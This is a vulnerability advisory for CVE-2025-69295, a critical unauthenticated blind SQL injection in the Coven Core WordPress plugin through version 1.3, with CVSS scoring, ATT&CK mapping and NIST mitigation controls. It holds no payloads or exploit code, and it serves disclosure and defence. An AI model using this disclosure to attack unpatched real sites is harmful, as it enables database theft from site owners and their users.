CVE-2025-69295
Published: 20 February 2026
Summary
CVE-2025-69295 is a critical-severity SQL Injection (CWE-89) vulnerability. Its CVSS base score is 9.3 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 32.6th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 RA-5 (Vulnerability Monitoring and Scanning) and SI-10 (Information Input Validation).
Deeper analysis
CVE-2025-69295 is an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability that enables Blind SQL Injection in the TeconceTheme Coven Core (coven-core) WordPress plugin. This flaw affects Coven Core versions from n/a through 1.3 inclusive and was published on 2026-02-20.
The vulnerability carries a CVSS v3.1 base score of 9.3 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L), meaning unauthenticated remote attackers require only low complexity and no user interaction to exploit it over the network. Exploitation allows attackers to achieve high confidentiality impact through data extraction from the database, alongside low availability impact and a change in scope.
Mitigation details are available in the Patchstack advisory at https://patchstack.com/database/Wordpress/Plugin/coven-core/vulnerability/wordpress-coven-core-plugin-1-3-sql-injection-vulnerability?_s_id=cve, which addresses the SQL injection vulnerability in the WordPress Coven Core plugin version 1.3.
OWASP Top 10 for Web (2025)
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-207935
Vulnerability details
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Coven Core coven-core allows Blind SQL Injection.This issue affects Coven Core: from n/a through <= 1.3.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Direct unauthenticated SQL injection in public-facing WordPress plugin enables remote exploitation of the application.
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
SI-10 requires input validation mechanisms that directly neutralize special elements in SQL commands, preventing blind SQL injection exploitation in the Coven Core plugin.
SI-2 mandates timely identification, reporting, and correction of flaws like the SQL injection vulnerability in Coven Core versions up to 1.3.
RA-5 ensures vulnerability scanning that identifies SQL injection flaws in plugins like Coven Core, enabling proactive remediation.